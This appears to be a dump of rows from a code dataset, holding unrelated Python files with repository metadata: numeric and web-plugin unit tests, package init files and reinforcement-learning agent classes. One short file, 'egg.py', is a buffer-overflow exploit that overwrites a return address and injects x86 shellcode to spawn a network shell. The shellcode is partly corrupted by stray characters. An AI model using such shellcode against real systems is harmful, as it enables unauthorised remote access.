qnorm.quantile_normalize(arr.T, axis=0).T,
qnorm.quantile_normalize(arr, axis=1),
)
np.testing.assert_array_almost_equal(
qnorm.quantile_normalize(arr, axis=1),
qnorm.quantile_normalize(arr.T, axis=0).T,
)
def test_011_axis_pandas(self):
"""
test numpy axis support
"""
df = pd.DataFrame(
{
"C1": {"A": 5.0, "B": 2.0, "C": 3.0, "D": 4.0},
"C2": {"A": 4.0, "B": 1.0, "C": 4.0, "D": 2.0},
"C3": {"A": 3.0, "B": 4.0, "C": 6.0, "D": 8.0},
}
)
np.testing.assert_array_almost_equal(
qnorm.quantile_normalize(df.T, axis=0).T,
qnorm.quantile_normalize(df, axis=1),
)
np.testing.assert_array_almost_equal(
qnorm.quantile_normalize(df, axis=1),
qnorm.quantile_normalize(df.T, axis=0).T,
)
def test_012_from_csv(self):
"""
test the basic incremental_quantile_normalize functionality
"""
qnorm.incremental_quantile_normalize("test.csv", "test_out.csv")
df1 = pd.read_csv("test.csv", index_col=0, header=0)
df2 = pd.read_csv("test_out.csv", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_013_from_csv_rowchunk(self):
"""
test the incremental_quantile_normalize with rowchunks functionality
"""
df1 = pd.read_csv("test.csv", index_col=0, header=0)
for rowchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.csv", "test_out.csv", rowchunksize=rowchunksize
)
df2 = pd.read_csv("test_out.csv", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_014_from_csv_colchunk(self):
"""
test the incremental_quantile_normalize with colchunks functionality
"""
df1 = pd.read_csv("test.csv", index_col=0, header=0)
for colchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.csv", "test_out.csv", colchunksize=colchunksize
)
df2 = pd.read_csv("test_out.csv", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_015_from_csv_colrowchunk(self):
"""
test the incremental_quantile_normalize with both row and colchunks
"""
df1 = pd.read_csv("test.csv", index_col=0, header=0)
for colchunksize in range(1, 10):
for rowchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.csv",
"test_out.csv",
rowchunksize=rowchunksize,
colchunksize=colchunksize,
)
df2 = pd.read_csv("test_out.csv", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_016_from_csv_largefile(self):
"""
test whether or not incremental_quantile_normalize works with a larger
random file
"""
np.random.seed(42)
df1 = pd.DataFrame(index=range(5000), columns=range(100))
df1[:] = np.random.randint(0, 100, size=df1.shape)
df1.to_csv("test_large.csv")
qnorm.incremental_quantile_normalize(
"test_large.csv",
"test_large_out.csv",
rowchunksize=11,
colchunksize=11,
)
df2 = pd.read_csv("test_large_out.csv", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=4
)
def test_017_from_hdf(self):
"""
test the basic incremental_quantile_normalize functionality
"""
qnorm.incremental_quantile_normalize("test.hdf", "test_out.hdf")
df1 = pd.read_hdf("test.hdf", index_col=0, header=0)
df2 = pd.read_hdf("test_out.hdf", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_018_from_hdf_rowchunk(self):
"""
test the incremental_quantile_normalize with rowchunks functionality
"""
df1 = pd.read_hdf("test.hdf", index_col=0, header=0)
for rowchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.hdf", "test_out.hdf", rowchunksize=rowchunksize
)
df2 = pd.read_hdf("test_out.hdf", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_019_from_hdf_colchunk(self):
"""
test the incremental_quantile_normalize with colchunks functionality
"""
df1 = pd.read_hdf("test.hdf", index_col=0, header=0)
for colchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.hdf", "test_out.hdf", colchunksize=colchunksize
)
df2 = pd.read_hdf("test_out.hdf", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_020_from_hdf_colrowchunk(self):
"""
test the incremental_quantile_normalize with both row and colchunks
"""
df1 = pd.read_hdf("test.hdf", index_col=0, header=0)
for colchunksize in range(1, 10):
for rowchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.hdf",
"test_out.hdf",
rowchunksize=rowchunksize,
colchunksize=colchunksize,
)
df2 = pd.read_hdf("test_out.hdf", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_021_from_hdf_largefile(self):
"""
test whether or not incremental_quantile_normalize works with a larger
random file
"""
np.random.seed(42)
df1 = pd.DataFrame(
index=range(5000),
columns=["sample" + str(col) for col in range(100)],
dtype=int,
)
df1[:] = np.random.randint(0, 100, size=df1.shape)
df1.to_hdf(
"test_large.hdf", key="qnorm", format="table", data_columns=True
)
qnorm.incremental_quantile_normalize(
"test_large.hdf",
"test_large_out.hdf",
rowchunksize=11,
colchunksize=11,
)
df2 = pd.read_hdf("test_large_out.hdf", index_col=0, header=0)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=4
)
def test_022(self):
"""
Test another array, not just wiki example.
"""
df = pd.DataFrame(
{
"C1": {
"A": 2.0,
"B": 2.0,
"C": 2.0,
"D": 2.0,
"E": 6.0,
"F": 1.0,
},
"C2": {
"A": 2.0,
"B": 2.0,
"C": 1.0,
"D": 3.5,
"E": 5.0,
"F": 1.0,
},
}
)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df).values,
np.array(
[
[2.0625, 2.0],
[2.0625, 2.0],
[2.0625, 1.25],
[2.0625, 2.75],
[5.5, 5.5],
[1.0, 1.25],
]
),
)
def test_023_from_parquet(self):
"""
test the basic incremental_quantile_normalize functionality
"""
qnorm.incremental_quantile_normalize("test.parquet", "test_out.parquet")
df1 = pd.read_parquet("test.parquet")
df2 = pd.read_parquet("test_out.parquet")
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_024_from_parquet_rowchunk(self):
"""
test the incremental_quantile_normalize with rowchunks functionality
"""
df1 = pd.read_parquet("test.parquet")
for rowchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.parquet", "test_out.parquet", rowchunksize=rowchunksize
)
df2 = pd.read_parquet("test_out.parquet")
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_025_from_parquet_colchunk(self):
"""
test the incremental_quantile_normalize with colchunks functionality
"""
df1 = pd.read_parquet("test.parquet")
for colchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.parquet", "test_out.parquet", colchunksize=colchunksize
)
df2 = pd.read_parquet("test_out.parquet")
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_026_from_parquet_colrowchunk(self):
"""
test the incremental_quantile_normalize with both row and colchunks
"""
df1 = pd.read_parquet("test.parquet")
for colchunksize in range(1, 10):
for rowchunksize in range(1, 10):
qnorm.incremental_quantile_normalize(
"test.parquet",
"test_out.parquet",
rowchunksize=rowchunksize,
colchunksize=colchunksize,
)
df2 = pd.read_parquet("test_out.parquet")
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=5
)
def test_027_from_parquet_largefile(self):
"""
test whether or not incremental_quantile_normalize works with a larger
random file
"""
np.random.seed(42)
df1 = pd.DataFrame(
index=range(5000),
columns=["sample" + str(col) for col in range(100)],
)
df1[:] = np.random.randint(0, 100, size=df1.shape)
df1 = df1.astype(float)
df1.to_parquet("test_large.parquet")
qnorm.incremental_quantile_normalize(
"test_large.parquet",
"test_large_out.parquet",
rowchunksize=11,
colchunksize=11,
)
df2 = pd.read_parquet("test_large_out.parquet")
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df1), df2.values, decimal=4
)
def test_028(self):
"""
Test another array, not just wiki example.
"""
df = pd.DataFrame(
{
"C1": {
"A": 2.0,
"B": 2.0,
"C": 2.0,
"D": 2.0,
"E": 6.0,
"F": 1.0,
},
"C2": {
"A": 2.0,
"B": 2.0,
"C": 1.0,
"D": 3.5,
"E": 5.0,
"F": 1.0,
},
}
)
np.testing.assert_almost_equal(
qnorm.quantile_normalize(df).values,
np.array(
[
[2.0625, 2.0],
[2.0625, 2.0],
[2.0625, 1.25],
[2.0625, 2.75],
[5.5, 5.5],
[1.0, 1.25],
]
),
)
if __name__ == "__main__":
unittest.main()
| 31.826325 | 80 | 0.509047 | 2,069 | 17,409 | 4.111648 | 0.101498 | 0.129893 | 0.090514 | 0.064888 | 0.852239 | 0.828377 | 0.792876 | 0.773951 | 0.754085 | 0.74856 | 0 | 0.069679 | 0.364409 | 17,409 | 546 | 81 | 31.884615 | 0.699141 | 0.097766 | 0 | 0.566929 | 0 | 0 | 0.066862 | 0.002933 | 0 | 0 | 0 | 0 | 0.076115 | 1 | 0.076115 | false | 0 | 0.013123 | 0 | 0.091864 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b7c66db38c9337b3d9cbb8a39b7c88173680a719 | 686 | py | Python | 2020/15/test_code.py | Akumatic/Advent-of-Code | bf2efe4d5a2c95ceb5f52ddbbc15ef0f2ac48618 | [
"MIT"
] | 22 | 2019-12-13T20:41:52.000Z | 2022-01-05T00:19:21.000Z | 2020/15/test_code.py | Akumatic/Advent-of-Code | bf2efe4d5a2c95ceb5f52ddbbc15ef0f2ac48618 | [
"MIT"
] | null | null | null | 2020/15/test_code.py | Akumatic/Advent-of-Code | bf2efe4d5a2c95ceb5f52ddbbc15ef0f2ac48618 | [
"MIT"
] | 13 | 2019-12-21T02:35:19.000Z | 2022-02-14T09:37:01.000Z | # SPDX-License-Identifier: MIT
# Copyright (c) 2020 Akumatic
from code import part1, part2
def test():
assert part1([0, 3, 6]) == 436
assert part1([1, 3, 2]) == 1
assert part1([2, 1, 3]) == 10
assert part1([1, 2, 3]) == 27
assert part1([2, 3, 1]) == 78
assert part1([3, 2, 1]) == 438
assert part1([3, 1, 2]) == 1836
print(f"Passed part 1")
assert part2([0,3,6]) == 175594
assert part2([1,3,2]) == 2578
assert part2([2,1,3]) == 3544142
assert part2([1,2,3]) == 261214
assert part2([2,3,1]) == 6895259
assert part2([3,2,1]) == 18
assert part2([3,1,2]) == 362
print(f"Passed part 2")
if __name__ == "__main__":
test() | 26.384615 | 36 | 0.555394 | 113 | 686 | 3.300885 | 0.362832 | 0.206434 | 0.024129 | 0.085791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223507 | 0.24344 | 686 | 26 | 37 | 26.384615 | 0.495183 | 0.081633 | 0 | 0 | 0 | 0 | 0.05414 | 0 | 0 | 0 | 0 | 0 | 0.7 | 1 | 0.05 | true | 0.1 | 0.05 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
b7e6e8868014b8ffa1957a6b579874e65c277a54 | 128 | py | Python | app/api/__init__.py | diegog/flask-api | 6d69122f8623722e3ef2e2a09bdb2a110f89cb71 | [
"MIT"
] | null | null | null | app/api/__init__.py | diegog/flask-api | 6d69122f8623722e3ef2e2a09bdb2a110f89cb71 | [
"MIT"
] | null | null | null | app/api/__init__.py | diegog/flask-api | 6d69122f8623722e3ef2e2a09bdb2a110f89cb71 | [
"MIT"
] | null | null | null | """Routes Initialization"""
from flask import Blueprint
api = Blueprint('api', __name__)
# Import routes
import app.api.routes | 18.285714 | 32 | 0.757813 | 16 | 128 | 5.8125 | 0.5625 | 0.258065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 128 | 7 | 33 | 18.285714 | 0.830357 | 0.28125 | 0 | 0 | 0 | 0 | 0.034483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
b7eec647aff19a4f63679b8ba71c343b0ba503e7 | 233 | py | Python | flambe/nlp/language_modeling/__init__.py | cavaunpeu/flambe | 44f9439ba93bcf1d3ed69af96e4090b4d7cf6adb | [
"MIT"
] | null | null | null | flambe/nlp/language_modeling/__init__.py | cavaunpeu/flambe | 44f9439ba93bcf1d3ed69af96e4090b4d7cf6adb | [
"MIT"
] | null | null | null | flambe/nlp/language_modeling/__init__.py | cavaunpeu/flambe | 44f9439ba93bcf1d3ed69af96e4090b4d7cf6adb | [
"MIT"
] | null | null | null | from flambe.nlp.language_modeling.datasets import PTBDataset
from flambe.nlp.language_modeling.fields import LMField
from flambe.nlp.language_modeling.model import LanguageModel
__all__ = ['PTBDataset', 'LanguageModel', 'LMField']
| 33.285714 | 60 | 0.832618 | 28 | 233 | 6.678571 | 0.464286 | 0.160428 | 0.208556 | 0.336898 | 0.465241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081545 | 233 | 6 | 61 | 38.833333 | 0.873832 | 0 | 0 | 0 | 0 | 0 | 0.128755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7f831338de4ab52bf93486fd85585210c10a17a | 5,282 | py | Python | grpr2-a/utils/agents.py | saarcohen30/GrPR2-A | aafb3e1c5eb9bfbbd04cbd43d32fdffeefd64591 | [
"MIT"
] | null | null | null | grpr2-a/utils/agents.py | saarcohen30/GrPR2-A | aafb3e1c5eb9bfbbd04cbd43d32fdffeefd64591 | [
"MIT"
] | null | null | null | grpr2-a/utils/agents.py | saarcohen30/GrPR2-A | aafb3e1c5eb9bfbbd04cbd43d32fdffeefd64591 | [
"MIT"
] | null | null | null | from torch import Tensor
from torch.autograd import Variable
from torch.optim import Adam
from utils.misc import hard_update, gumbel_softmax, onehot_from_logits
from utils.policies import DiscretePolicy, DiscreteConditionalPolicy
import time
class AttentionAgent(object):
"""
General class for Attention agents (policy, target policy)
"""
def __init__(self, num_in_pol, num_out_pol, messg_dim, hidden_dim=64,
lr=0.01, onehot_dim=0):
"""
Inputs:
num_in_pol (int): number of dimensions for policy input
num_out_pol (int): number of dimensions for policy output
"""
self.policy = DiscretePolicy(num_in_pol, num_out_pol, messg_dim,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
self.target_policy = DiscretePolicy(num_in_pol,
num_out_pol,
messg_dim,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
hard_update(self.target_policy, self.policy)
self.policy_optimizer = Adam(self.policy.parameters(), lr=lr)
def step(self, obs_messg, explore=False):
"""
Take a step forward in environment for a minibatch of observations
Inputs:
obs (PyTorch Variable): Observations for this agent
explore (boolean): Whether or not to sample
Outputs:
action (PyTorch Variable): Actions for this agent
"""
result = self.policy(obs_messg, sample=explore)
return result
def get_params(self):
return {'policy': self.policy.state_dict(),
'target_policy': self.target_policy.state_dict(),
'policy_optimizer': self.policy_optimizer.state_dict()}
def load_params(self, params):
self.policy.load_state_dict(params['policy'])
self.target_policy.load_state_dict(params['target_policy'])
self.policy_optimizer.load_state_dict(params['policy_optimizer'])
class AttentionREGMAAgent(object):
"""
General class for REGMA Attention agents (opponent policy, policy, target opponent policy, target policy)
"""
def __init__(self, num_in_pol, num_out_pol, messg_dim, action_dim, agent_num, hidden_dim=64,
lr=0.01, onehot_dim=0):
"""
Inputs:
num_in_pol (int): number of dimensions for policy input
num_out_pol (int): number of dimensions for policy output
"""
self.opponent_policy = DiscretePolicy(num_in_pol, num_out_pol * (agent_num - 1), messg_dim,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
self.policy = DiscreteConditionalPolicy(self.opponent_policy,
num_in_pol + action_dim * (agent_num - 1), num_out_pol, messg_dim,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
self.target_opponent_policy = DiscretePolicy(num_in_pol, num_out_pol * (agent_num - 1), messg_dim,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
self.target_policy = DiscreteConditionalPolicy(self.target_opponent_policy, num_in_pol + action_dim * (agent_num - 1),
num_out_pol,
messg_dim,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
hard_update(self.target_opponent_policy, self.opponent_policy)
hard_update(self.target_policy, self.policy)
self.policy_optimizer = Adam(self.policy.parameters(), lr=lr)
self.opponent_policy_optimizer = Adam(self.opponent_policy.parameters(), lr=lr)
def step(self, obs_messg, explore=False):
"""
Take a step forward in environment for a minibatch of observations
Inputs:
obs (PyTorch Variable): Observations for this agent
explore (boolean): Whether or not to sample
Outputs:
action (PyTorch Variable): Actions for this agent
"""
result, _ = self.policy(obs_messg, sample=explore)
return result
def get_params(self):
return {'policy': self.policy.state_dict(),
'target_policy': self.target_policy.state_dict(),
'policy_optimizer': self.policy_optimizer.state_dict()}
def load_params(self, params):
self.policy.load_state_dict(params['policy'])
self.target_policy.load_state_dict(params['target_policy'])
self.opponent_policy.load_state_dict(params['opponent_policy'])
self.target_opponent_policy.load_state_dict(params['target_opponent_policy'])
self.policy_optimizer.load_state_dict(params['policy_optimizer'])
| 47.585586 | 127 | 0.577811 | 569 | 5,282 | 5.065026 | 0.149385 | 0.062457 | 0.054129 | 0.052741 | 0.807772 | 0.807772 | 0.78279 | 0.78279 | 0.78279 | 0.78279 | 0 | 0.004634 | 0.34627 | 5,282 | 110 | 128 | 48.018182 | 0.830003 | 0.171905 | 0 | 0.646154 | 0 | 0 | 0.043932 | 0.00546 | 0 | 0 | 0 | 0 | 0 | 1 | 0.123077 | false | 0 | 0.092308 | 0.030769 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4d0956ef43b26d6ad1f9d9cc3ab18d705515b7b2 | 4,555 | py | Python | server/tests/test_batch.py | OpenChemistry/experimentaldataplatform | f45a7ee4f9087a3e8fa61374ade4bd7b04584f61 | [
"BSD-3-Clause"
] | 2 | 2018-10-10T20:38:14.000Z | 2020-07-01T13:14:59.000Z | server/tests/test_batch.py | OpenChemistry/experimentaldataplatform | f45a7ee4f9087a3e8fa61374ade4bd7b04584f61 | [
"BSD-3-Clause"
] | 23 | 2018-09-06T22:31:53.000Z | 2021-05-24T13:22:04.000Z | server/tests/test_batch.py | OpenChemistry/edp | f45a7ee4f9087a3e8fa61374ade4bd7b04584f61 | [
"BSD-3-Clause"
] | null | null | null | import pytest
import datetime
import json
from pytest_girder.assertions import assertStatus, assertStatusOk
@pytest.mark.plugin('edp')
def test_create_public(server, user, project, cycle, batch_request):
from girder.plugins.edp.models.batch import Batch
r = server.request('/edp/projects/%s/cycles/%s/batches' % (project['_id'], cycle['_id']),
method='POST', body=json.dumps(batch_request),
type='application/json', user=user)
assertStatus(r, 201)
assert '_id' in r.json
batch = Batch().load(r.json['_id'], force=True)
assert batch['owner'] == user['_id']
assert batch_request.items() <= batch.items()
@pytest.mark.plugin('edp')
def test_create_private(server, user, project, cycle, batch_request):
from girder.plugins.edp.models.batch import Batch
r = server.request('/edp/projects/%s/cycles/%s/batches' % (project['_id'], cycle['_id']),
method='POST', body=json.dumps(batch_request),
type='application/json', user=user)
assertStatus(r, 201)
assert '_id' in r.json
batch = Batch().load(r.json['_id'], force=True)
assert batch_request.items() <= batch.items()
@pytest.mark.plugin('edp')
def test_update(server, user, project, cycle, batch):
from girder.plugins.edp.models.batch import Batch
updates = {
'title': 'Nothing to see here.',
'dataNotes': 'Notes'
}
r = server.request('/edp/projects/%s/cycles/%s/batches/%s' % (project['_id'], cycle['_id'], batch['_id']),
method='PATCH', body=json.dumps(updates),
type='application/json', user=user)
assertStatusOk(r)
batch = Batch().load(r.json['_id'], force=True)
assert updates.items() <= batch.items()
@pytest.mark.plugin('edp')
def test_update_non_existent(server, user, project, cycle, batch):
from girder.plugins.edp.models.batch import Batch
updates = {
'title': 'Nothing to see here.',
'dataNotes': 'Notes'
}
non_existent = '5ae71e1ff657102b11ce2233'
r = server.request('/edp/projects/%s/cycles/%s/batches/%s' % (project['_id'], cycle['_id'], non_existent),
method='PATCH', body=json.dumps(updates),
type='application/json', user=user)
assertStatus(r, 400)
@pytest.mark.plugin('edp')
def test_delete(server, user, project, cycle, batch):
from girder.plugins.edp.models.batch import Batch
r = server.request('/edp/projects/%s/cycles/%s/batches/%s' % (project['_id'], cycle['_id'], batch['_id']),
method='DELETE', user=user)
assertStatusOk(r)
batch = Batch().load(batch['_id'], force=True)
assert batch is None
@pytest.mark.plugin('edp')
def test_delete_with_test(server, user, project, cycle, batch, cycletest):
from girder.plugins.edp.models.batch import Batch
from girder.plugins.edp.models.cycletest import CycleTest
r = server.request('/edp/projects/%s/cycles/%s/batches/%s' % (project['_id'], cycle['_id'], batch['_id']),
method='DELETE', user=user)
assertStatusOk(r)
batch = Batch().load(batch['_id'], force=True)
assert batch is None
cycletest = CycleTest().load(cycletest['_id'], force=True)
assert cycletest is None
@pytest.mark.plugin('edp')
def test_find(server, user, project, cycle, batch):
r = server.request('/edp/projects/%s/cycles/%s/batches' % (project['_id'], cycle['_id']),
method='GET', user=user)
assertStatusOk(r)
assert len(r.json) == 1
@pytest.mark.plugin('edp')
def test_find_owner(server, user, admin, project, cycle, batch):
from girder.plugins.edp.models.batch import Batch
params = {
'owner': admin['_id']
}
r = server.request('/edp/projects/%s/cycles/%s/batches' % (project['_id'], cycle['_id']),
params=params, method='GET', user=user)
assertStatusOk(r)
assert len(r.json) == 0
params['owner'] = user['_id']
r = server.request('/edp/projects/%s/cycles/%s/batches' % (project['_id'], cycle['_id']),
params=params, method='GET', user=user)
assertStatusOk(r)
assert len(r.json) == 1
@pytest.mark.plugin('edp')
def test_get(server, user, admin, project, cycle, batch):
r = server.request('/edp/projects/%s/cycles/%s/batches/%s' % (project['_id'], cycle['_id'], batch['_id']),
method='GET', user=user)
assertStatusOk(r)
assert batch.items() <= r.json.items()
| 34.507576 | 110 | 0.623271 | 576 | 4,555 | 4.824653 | 0.123264 | 0.025189 | 0.050378 | 0.061173 | 0.876574 | 0.86326 | 0.843109 | 0.802807 | 0.755308 | 0.742353 | 0 | 0.007754 | 0.207245 | 4,555 | 131 | 111 | 34.770992 | 0.761839 | 0 | 0 | 0.697917 | 0 | 0 | 0.155907 | 0.083224 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.09375 | false | 0 | 0.125 | 0 | 0.21875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4d45ee737131035cb363c6a750a433e55637c1c5 | 176 | py | Python | app/users/__init__.py | JoneNaZi/Interfaceplatform | 5f4dbd40f06f9c24ae9fbdacf7162d9b2bed2715 | [
"MIT"
] | 729 | 2017-07-25T13:25:43.000Z | 2022-03-27T08:41:32.000Z | app/users/__init__.py | o0Kardos0o/FXTest | 414a20024ae164035ec31982cda252eaa6b129b8 | [
"MIT"
] | 10 | 2019-01-23T06:46:06.000Z | 2021-02-09T13:19:56.000Z | app/users/__init__.py | o0Kardos0o/FXTest | 414a20024ae164035ec31982cda252eaa6b129b8 | [
"MIT"
] | 395 | 2017-07-26T02:11:32.000Z | 2022-03-16T11:17:18.000Z | # -*- coding: utf-8 -*-
# @Author : lileilei
# @File : __init__.py.py
# @Time : 2017/12/7 12:24
from app.users.views import user
from app.users import views, urls
| 25.142857 | 34 | 0.619318 | 27 | 176 | 3.888889 | 0.740741 | 0.133333 | 0.228571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 0.227273 | 176 | 6 | 35 | 29.333333 | 0.683824 | 0.534091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4d6c2f3cf6da9a82a39fbd88954f0e4ce4720605 | 610 | py | Python | algorithms/egg.py | callaunchpad/MOR | becd8a181312882dae3d3495a730e268183f803f | [
"MIT"
] | 1 | 2018-02-11T03:09:49.000Z | 2018-02-11T03:09:49.000Z | algorithms/egg.py | callaunchpad/MOR | becd8a181312882dae3d3495a730e268183f803f | [
"MIT"
] | 2 | 2018-02-08T19:45:20.000Z | 2018-10-02T09:55:39.000Z | algorithms/egg.py | callaunchpad/MOR | becd8a181312882dae3d3495a730e268183f803f | [
"MIT"
] | 2 | 2018-02-10T22:51:57.000Z | 2020-04-14T02:46:22.000Z | #!/usr/bin/env python
ret = 0x804861c
xor = 0x42
ebp = 0xbffffc18
buff = "0"*1768
buff += "\x18\xfc\xff\xbf"
buff += "\x1c\x86\x04\x08"
# buff += chr(ord("B") ^ xor)*4
buff += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" + "\x80\x5b\x…5e\x52\x68\x02\x00\x1a\x0a\x6a\x10\x51\x50\x89" + "\xe1\x6a\x66\x58\xcd\x80\x89…\x41\x04\xb3\x04\xb0\x66\xcd" + "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\x…cd\x80\x49" + "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" + "\x5…0\x53\x89\xe1\xb0\x0b\xcd\x80"
xorbuf = ""
for i in range(len(buff)):
xorbuf += chr(ord(buff[i]) ^ xor)
print buff
| 38.125 | 351 | 0.645902 | 130 | 610 | 3.123077 | 0.576923 | 0.073892 | 0.066502 | 0.08867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.261343 | 0.096721 | 610 | 15 | 352 | 40.666667 | 0.453721 | 0.081967 | 0 | 0 | 0 | 0.454545 | 0.625448 | 0.566308 | 0.090909 | 0 | 0.041219 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4d838eb21e9e6d10abe54cc8ace733c7f3e1b66e | 26 | py | Python | .history/ClassFiles/PythonModulesPackages/ImportingModules/Pychache/File1_20210107135255.py | minefarmer/Comprehensive-Python | f97b9b83ec328fc4e4815607e6a65de90bb8de66 | [
"Unlicense"
] | null | null | null | .history/ClassFiles/PythonModulesPackages/ImportingModules/Pychache/File1_20210107135255.py | minefarmer/Comprehensive-Python | f97b9b83ec328fc4e4815607e6a65de90bb8de66 | [
"Unlicense"
] | null | null | null | .history/ClassFiles/PythonModulesPackages/ImportingModules/Pychache/File1_20210107135255.py | minefarmer/Comprehensive-Python | f97b9b83ec328fc4e4815607e6a65de90bb8de66 | [
"Unlicense"
] | null | null | null | print("Hello from file 1") | 26 | 26 | 0.730769 | 5 | 26 | 3.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.115385 | 26 | 1 | 26 | 26 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
4d850e6fb783ec8a994504f5827a4d9c4864eaf5 | 43 | py | Python | dms/v2/student/__init__.py | moreal/DMS-api | 9624e28764ec4535002677671e10a09d762d19a8 | [
"MIT"
